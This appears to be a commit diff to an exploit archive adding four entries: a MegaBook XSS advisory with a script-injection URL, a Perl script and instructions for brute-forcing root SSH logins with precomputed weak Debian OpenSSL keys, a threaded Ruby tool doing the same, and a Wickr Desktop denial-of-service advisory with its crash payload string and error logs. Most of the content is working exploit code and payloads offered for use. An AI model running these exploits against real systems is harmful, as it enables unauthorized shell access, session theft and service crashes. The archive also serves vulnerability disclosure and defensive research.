DB: 2016-01-10
4 new exploits
This commit is contained in:
parent
86d0c5fe16
commit
cf77140802
4 changed files with 374 additions and 0 deletions
9
platforms/cgi/webapps/25622.txt
Executable file
9
platforms/cgi/webapps/25622.txt
Executable file
|
@ -0,0 +1,9 @@
|
||||||
|
source: http://www.securityfocus.com/bid/13522/info
|
||||||
|
|
||||||
|
MegaBook is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.
|
||||||
|
|
||||||
|
An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
|
||||||
|
|
||||||
|
This issue is reported to affect MegaBook version 2.0; other versions may also be vulnerable.
|
||||||
|
|
||||||
|
http://www.example.com/admin.cgi?action=modifypost&entryid="><script>alert('wvs-xss-magic-string-703410097');</script>
|
53
platforms/linux/remote/5622.txt
Executable file
53
platforms/linux/remote/5622.txt
Executable file
|
@ -0,0 +1,53 @@
|
||||||
|
the debian openssl issue leads that there are only 65.536 possible ssh
|
||||||
|
keys generated, cause the only entropy is the pid of the process
|
||||||
|
generating the key.
|
||||||
|
|
||||||
|
This leads to that the following perl script can be used with the
|
||||||
|
precalculated ssh keys to brute force the ssh login. It works if such a
|
||||||
|
keys is installed on a non-patched debian or any other system manual
|
||||||
|
configured to.
|
||||||
|
|
||||||
|
On an unpatched system, which doesn't need to be debian, do the following:
|
||||||
|
|
||||||
|
keys provided by HD Moore - http://metasploit.com/users/hdm/tools/debian-openssl/
|
||||||
|
|
||||||
|
1. Download http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2
|
||||||
|
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5622.tar.bz2 (debian_ssh_rsa_2048_x86.tar.bz2)
|
||||||
|
|
||||||
|
2. Extract it to a directory
|
||||||
|
|
||||||
|
3. Enter into the /root/.ssh/authorized_keys a SSH RSA key with 2048
|
||||||
|
Bits, generated on an upatched debian (this is the key this exploit will
|
||||||
|
break)
|
||||||
|
|
||||||
|
4. Run the perl script and give it the location to where you extracted
|
||||||
|
the bzip2 mentioned.
|
||||||
|
|
||||||
|
#!/usr/bin/perl
|
||||||
|
my $keysPerConnect = 6;
|
||||||
|
unless ($ARGV[1]) {
|
||||||
|
print "Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n";
|
||||||
|
print "Example: ./exploiter.pl /root/keys/ 127.0.0.1\n";
|
||||||
|
print "By mm@deadbeef.de\n";
|
||||||
|
exit 0;
|
||||||
|
}
|
||||||
|
chdir($ARGV[0]);
|
||||||
|
opendir(A, $ARGV[0]) || die("opendir");
|
||||||
|
while ($_ = readdir(A)) {
|
||||||
|
chomp;
|
||||||
|
next unless m,^\d+$,;
|
||||||
|
push(@a, $_);
|
||||||
|
if (scalar(@a) > $keysPerConnect) {
|
||||||
|
system("echo ".join(" ", @a)."; ssh -l root ".join(" ", map { "-i
|
||||||
|
".$_ } @a)." ".$ARGV[1]);
|
||||||
|
@a = ();
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
5. Enjoy the shell after some minutes (less than 20 minutes)
|
||||||
|
|
||||||
|
Regards,
|
||||||
|
Markus Mueller
|
||||||
|
mm@deadbeef.de
|
||||||
|
|
||||||
|
# milw0rm.com [2008-05-15]
|
78
platforms/linux/remote/5632.rb
Executable file
78
platforms/linux/remote/5632.rb
Executable file
|
@ -0,0 +1,78 @@
|
||||||
|
#!/usr/bin/ruby
|
||||||
|
#
|
||||||
|
# Debian SSH Key Tester
|
||||||
|
# L4teral <l4teral [at] gmail com>
|
||||||
|
#
|
||||||
|
# This tool helps to find user accounts with weak SSH keys
|
||||||
|
# that should be regenerated with an unaffected version
|
||||||
|
# of openssl.
|
||||||
|
#
|
||||||
|
# You will need the precalculated keys provided by HD Moore
|
||||||
|
# See http://metasploit.com/users/hdm/tools/debian-openssl/
|
||||||
|
# for further information.
|
||||||
|
#
|
||||||
|
# Common Keys:
|
||||||
|
#
|
||||||
|
# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5632.tar.bz2 (debian_ssh_dsa_1024_x86.tar.bz2)
|
||||||
|
# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5622.tar.bz2 (debian_ssh_rsa_2048_x86.tar.bz2)
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# Usage:
|
||||||
|
# debian_openssh_key_test.rb <host> <user> <keydir>
|
||||||
|
#
|
||||||
|
|
||||||
|
require 'thread'
|
||||||
|
|
||||||
|
THREADCOUNT = 10
|
||||||
|
KEYSPERCONNECT = 3
|
||||||
|
|
||||||
|
queue = Queue.new
|
||||||
|
threads = []
|
||||||
|
keyfiles = []
|
||||||
|
|
||||||
|
host = ARGV.shift or raise "no host given!"
|
||||||
|
user = ARGV.shift or raise "no user given!"
|
||||||
|
keysdir = ARGV.shift or raise "no key dir given!"
|
||||||
|
|
||||||
|
Dir.new(keysdir).each do |f|
|
||||||
|
if f =~ /\d+$/ then
|
||||||
|
keyfiles << f
|
||||||
|
queue << f
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
totalkeys = queue.length
|
||||||
|
currentkey = 1
|
||||||
|
|
||||||
|
THREADCOUNT.times do |i|
|
||||||
|
threads << Thread.new(i) do |j|
|
||||||
|
while !queue.empty?
|
||||||
|
keys = []
|
||||||
|
KEYSPERCONNECT.times { keys << queue.pop unless queue.empty? }
|
||||||
|
keys.map! { |f| f = File.join(keysdir, f) }
|
||||||
|
keys.each do |k|
|
||||||
|
puts "testing key #{currentkey}/#{totalkeys} #{k}..."
|
||||||
|
currentkey += 1
|
||||||
|
end
|
||||||
|
system "ssh -l #{user} -o PasswordAuthentication=no -i #{keys.join(" -i ")} #{host} \"exit\" &>/dev/null"
|
||||||
|
if $? == 0 then
|
||||||
|
keys.each do |k|
|
||||||
|
system "ssh -l #{user} -o PasswordAuthentication=no -i #{k} #{host} \"exit\" &>/dev/null"
|
||||||
|
if $? == 0 then
|
||||||
|
puts "KEYFILE FOUND: \n#{k}"
|
||||||
|
exit
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
trap("SIGINT") do
|
||||||
|
threads.each { |t| t.exit() }
|
||||||
|
exit
|
||||||
|
end
|
||||||
|
|
||||||
|
threads.each { |t| t.join }
|
||||||
|
|
||||||
|
# milw0rm.com [2008-05-16]
|
234
platforms/windows/dos/35622.txt
Executable file
234
platforms/windows/dos/35622.txt
Executable file
|
@ -0,0 +1,234 @@
|
||||||
|
Document Title:
|
||||||
|
===============
|
||||||
|
Wickr Desktop v2.2.1 Windows - Denial of Service Vulnerability
|
||||||
|
|
||||||
|
|
||||||
|
References (Source):
|
||||||
|
====================
|
||||||
|
http://www.vulnerability-lab.com/get_content.php?id=1377
|
||||||
|
|
||||||
|
Video:
|
||||||
|
http://www.vulnerability-lab.com/get_content.php?id=1388
|
||||||
|
|
||||||
|
|
||||||
|
Release Date:
|
||||||
|
=============
|
||||||
|
2014-12-25
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability Laboratory ID (VL-ID):
|
||||||
|
====================================
|
||||||
|
1377
|
||||||
|
|
||||||
|
|
||||||
|
Common Vulnerability Scoring System:
|
||||||
|
====================================
|
||||||
|
3.3
|
||||||
|
|
||||||
|
|
||||||
|
Product & Service Introduction:
|
||||||
|
===============================
|
||||||
|
Wickr (pronounced `wicker`) is a proprietary instant messenger for iPhone and Android. Wickr allows users to exchange end-to-end encrypted and
|
||||||
|
self-destructing messages, including photos and file attachments. The `self-destruct` part of the software is designed to use a `Secure File Shredder`
|
||||||
|
which the company says `forensically erases unwanted files you deleted from your device`. However the company uses a proprietary algorithm to manage
|
||||||
|
the data, a practice which is prone to error according to many security experts.
|
||||||
|
|
||||||
|
On January 15, 2014, Wickr announced it is offering a US$100,000 bug bounty for those who find vulnerabilities that significantly impact users. In addition,
|
||||||
|
a recipient can in general use other software and techniques like screen-capture capabilities or a separate camera to make permanent copies of the content.
|
||||||
|
|
||||||
|
(Copy of the Homepage: https://wickr.com/ )
|
||||||
|
|
||||||
|
|
||||||
|
Abstract Advisory Information:
|
||||||
|
==============================
|
||||||
|
The Vulnerability Laboratory Research team discovered a denial of service web vulnerability in the offical Wickr Desktop v2.2.1 windows software.
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability Disclosure Timeline:
|
||||||
|
==================================
|
||||||
|
2014-12-25: Public Disclosure (Vulnerability Laboratory)
|
||||||
|
|
||||||
|
|
||||||
|
Discovery Status:
|
||||||
|
=================
|
||||||
|
Published
|
||||||
|
|
||||||
|
|
||||||
|
Affected Product(s):
|
||||||
|
====================
|
||||||
|
Wickr Inc.
|
||||||
|
Product: Wickr - Desktop Software (Windows) 2.2.1
|
||||||
|
|
||||||
|
|
||||||
|
Exploitation Technique:
|
||||||
|
=======================
|
||||||
|
Local
|
||||||
|
|
||||||
|
|
||||||
|
Severity Level:
|
||||||
|
===============
|
||||||
|
Medium
|
||||||
|
|
||||||
|
|
||||||
|
Technical Details & Description:
|
||||||
|
================================
|
||||||
|
A local denial of service vulnerability has been discovered in the official Wickr TSM v2.2.1 (MSI) windows software.
|
||||||
|
The issue allows local attackers to crash or shutdown the software client by usage of special crafted symbole payloads.
|
||||||
|
|
||||||
|
The wickr v2.2.1 (msi) software crashs with unhandled exception in the CFLite.dll by the qsqlcipher_wickr.dll when processing to include
|
||||||
|
special crafted symbole strings
|
||||||
|
as password or name. The issue occurs after the input of the payload to the `change name friend contacts`-, `the wickr password auth`-
|
||||||
|
and the `friends > add friends` input fields. Attackers are able to change the name value of the own profile (payload) to crash the
|
||||||
|
wickr client. Local attackers can include the payload to the input fields to crash/shutdown the application with unhandled exception.
|
||||||
|
|
||||||
|
The security risk of the denial of service vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.3.
|
||||||
|
Exploitation of the DoS vulnerability requires a low privileged application user account and low user interaction. Successful exploitation of
|
||||||
|
the vulnerability results in an application crash or service shutdown.
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerable Module(s):
|
||||||
|
[+] friend contacts
|
||||||
|
[+] wickr password auth
|
||||||
|
[+] friends
|
||||||
|
|
||||||
|
Vulnerbale Input(s):
|
||||||
|
[+] add friends (name)
|
||||||
|
[+] wickr password auth
|
||||||
|
[+] change friend (update name)
|
||||||
|
|
||||||
|
Vulnerable Parameter(s):
|
||||||
|
[+] name (value input)
|
||||||
|
[+] password (vale input)
|
||||||
|
|
||||||
|
|
||||||
|
Proof of Concept (PoC):
|
||||||
|
=======================
|
||||||
|
The denial of service web vulnerability can be exploited by remote attackers and local attackers with low user interaction.
|
||||||
|
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
|
||||||
|
|
||||||
|
|
||||||
|
Manual steps to reproduce the vulnerability ...
|
||||||
|
1. Download Wickr v2.2.1 for windows to your windows 8 box (mywickr.info/download.php?p=4)
|
||||||
|
2. Install the wickr windows version of the software to your windows 8 box
|
||||||
|
3. Create an new account and include the payload to the password input field
|
||||||
|
Note: After the payload has been processed to the auth, the software crashs. You should attach a debugger ago.
|
||||||
|
4. Successful reproduce of the first issue!
|
||||||
|
5. We register a new account with regular values
|
||||||
|
6. Open the friends > add friends section and include the payload to the search input value
|
||||||
|
Note: After the payload has been processed to add the friend, the software crashs. You should attach a debugger ago.
|
||||||
|
7. Successful reproduce of the second issue!
|
||||||
|
8. We open the software again and login. Switch to the existing friends contacts and edit the profile
|
||||||
|
9. Include in the name values the payload and save the settings
|
||||||
|
Note: After the payload has been processed to change to the name, the software crashs. You should attach a debugger ago.
|
||||||
|
4. Successful reproduce of the third issue!
|
||||||
|
|
||||||
|
|
||||||
|
Payload: Denial of Service
|
||||||
|
็¬็ส็็็็็ -็็็็็็็็็็็็็็็็็็็็ส็¬็็็็็็็็¬็็็็็็็็็็็็็็็็ส็็็็¬็็็็็็็็็-็็็็็็็ ็็็็็ส็็็็็็็¬็็็็็็็็็็¬็็็็็็็็ส็็็็็็็็็็¬็็็็็็็็็็็ ¬็็็็ส็็็็็็็็็็็็็¬็็็็ ็็็็็็็็¬ส็็็็็็็็็็็็็็็็-็็็็็็็็็ส็็็็็็็็็็็็็็็็็็็ ¬็็็็็็ส็็็็็็็¬ส็็็็็็็็็็็็็็็็็็็็็็็็็ส็็็¬¬็็็็็็็็็็็็็็็็็็็็็็ส็็็็็็¬็
|
||||||
|
|
||||||
|
|
||||||
|
--- Error Report Logs ---
|
||||||
|
EventType=APPCRASH
|
||||||
|
EventTime=130628671359850105
|
||||||
|
ReportType=2
|
||||||
|
Consent=1
|
||||||
|
UploadTime=130628671360390638
|
||||||
|
ReportIdentifier=df89d941-8208-11e4-be8b-54bef733d5e7
|
||||||
|
IntegratorReportIdentifier=df89d940-8208-11e4-be8b-54bef733d5e7
|
||||||
|
WOW64=1
|
||||||
|
NsAppName=Wickr.exe
|
||||||
|
Response.BucketId=96ac0935c87e28d0d5f61ef072fd75b8
|
||||||
|
Response.BucketTable=1
|
||||||
|
Response.LegacyBucketId=73726044048
|
||||||
|
Response.type=4
|
||||||
|
Sig[0].Name=Anwendungsname
|
||||||
|
Sig[0].Value=Wickr.exe
|
||||||
|
Sig[1].Name=Anwendungsversion
|
||||||
|
Sig[1].Value=0.0.0.0
|
||||||
|
Sig[2].Name=Anwendungszeitstempel
|
||||||
|
Sig[2].Value=02849d78
|
||||||
|
Sig[3].Name=Fehlermodulname
|
||||||
|
Sig[3].Value=CFLite.dll
|
||||||
|
Sig[4].Name=Fehlermodulversion
|
||||||
|
Sig[4].Value=0.0.0.0
|
||||||
|
Sig[5].Name=Fehlermodulzeitstempel
|
||||||
|
Sig[5].Value=53f6c178
|
||||||
|
Sig[6].Name=Ausnahmecode
|
||||||
|
Sig[6].Value=c0000005
|
||||||
|
Sig[7].Name=Ausnahmeoffset
|
||||||
|
Sig[7].Value=00027966
|
||||||
|
DynamicSig[1].Name=Betriebsystemversion
|
||||||
|
DynamicSig[1].Value=6.3.9600.2.0.0.256.48
|
||||||
|
DynamicSig[2].Name=Gebietsschema-ID
|
||||||
|
DynamicSig[2].Value=1031
|
||||||
|
DynamicSig[22].Name=Zusatzinformation 1
|
||||||
|
DynamicSig[22].Value=5861
|
||||||
|
DynamicSig[23].Name=Zusatzinformation 2
|
||||||
|
DynamicSig[23].Value=5861822e1919d7c014bbb064c64908b2
|
||||||
|
DynamicSig[24].Name=Zusatzinformation 3
|
||||||
|
DynamicSig[24].Value=84a0
|
||||||
|
DynamicSig[25].Name=Zusatzinformation 4
|
||||||
|
DynamicSig[25].Value=84a09ea102a12ee665c500221db8c9d6
|
||||||
|
UI[2]=C:\Program Files (x86)\Wickr Inc\Wickr - Top Secret Messenger\Wickr.exe
|
||||||
|
UI[3]=Wickr.exe funktioniert nicht mehr
|
||||||
|
UI[4]=Windows kann online nach einer Lösung für das Problem suchen.
|
||||||
|
UI[5]=Online nach einer Lösung suchen und das Programm schließen
|
||||||
|
UI[6]=Später online nach einer Lösung suchen und das Programm schließen
|
||||||
|
UI[7]=Programm schließen
|
||||||
|
... ... ... ...
|
||||||
|
LoadedModule[103]=C:\Program Files (x86)\Wickr Inc\Wickr - Top Secret Messenger\sqldrivers\qsqlcipher_wickr.dll
|
||||||
|
State[0].Key=Transport.DoneStage1
|
||||||
|
State[0].Value=1
|
||||||
|
FriendlyEventName=Nicht mehr funktionsfähig
|
||||||
|
ConsentKey=APPCRASH
|
||||||
|
AppName=Wickr.exe
|
||||||
|
AppPath=C:\Program Files (x86)\Wickr Inc\Wickr - Top Secret Messenger\Wickr.exe
|
||||||
|
NsPartner=windows
|
||||||
|
NsGroup=windows8
|
||||||
|
ApplicationIdentity=6A5425CE651532265F599A5A86C6C2EE
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Security Risk:
|
||||||
|
==============
|
||||||
|
The security risk of the denial of service web vulnerability in the wickr windows client software is estimated as medium. (CVSS 3.3)
|
||||||
|
|
||||||
|
|
||||||
|
Credits & Authors:
|
||||||
|
==================
|
||||||
|
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
|
||||||
|
|
||||||
|
|
||||||
|
Disclaimer & Information:
|
||||||
|
=========================
|
||||||
|
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
|
||||||
|
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
|
||||||
|
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
|
||||||
|
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
|
||||||
|
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
|
||||||
|
policies, deface websites, hack into databases or trade with fraud/stolen material.
|
||||||
|
|
||||||
|
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
|
||||||
|
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
|
||||||
|
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
|
||||||
|
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
|
||||||
|
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
|
||||||
|
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
|
||||||
|
|
||||||
|
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
|
||||||
|
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
|
||||||
|
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
|
||||||
|
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
|
||||||
|
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
|
||||||
|
|
||||||
|
Copyright © 2014 | Vulnerability Laboratory - [Evolution Security GmbH]™
|
||||||
|
|
||||||
|
|
||||||
|
--
|
||||||
|
VULNERABILITY LABORATORY - RESEARCH TEAM
|
||||||
|
SERVICE: www.vulnerability-lab.com
|
||||||
|
CONTACT: research@vulnerability-lab.com
|
||||||
|
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
|
||||||
|
|
||||||
|
|
||||||
|
|
Loading…
Add table
Reference in a new issue